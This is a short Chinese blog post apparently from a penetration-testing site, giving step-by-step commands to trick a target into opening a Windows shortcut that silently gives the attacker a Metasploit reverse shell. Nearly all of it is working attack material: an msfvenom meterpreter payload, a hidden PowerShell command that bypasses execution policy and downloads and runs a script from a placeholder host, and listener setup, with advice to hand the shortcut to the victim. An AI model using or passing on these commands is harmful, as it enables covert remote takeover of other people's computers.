🌤️ 加载中...
#
Web安全与渗透 2017-06-22

快捷方式powershell反弹到msf

By Jove 1 Views 2 MIN READ 0 Comments

生成一个msf后门

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f psh-reflection > psl.psl

 

在windows下创建一个快捷方式:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://xxx.com/psl.psl');"

 

or

msfvenom-p windows/x64/meterpreter/reverse_tcp LPORT=4444 LHOST=xxx.xxx.xxx.xxx -f psh-cmd

 

开启msf监听,然后把快捷方式丢给目标

use exploit/multi/hander

set PAYLOAD windows/x64/meterpreter/reverse_tcp

....

 

chcp 65001

本文由 Jove 原创

采用 CC BY-NC-SA 4.0 协议进行许可

转载请注明出处:https://www.jozxing.cc/index.php/archives/1090/

TAGS: 无标签

相关推荐

  • 暂无相关推荐,看看别的吧。

0 评论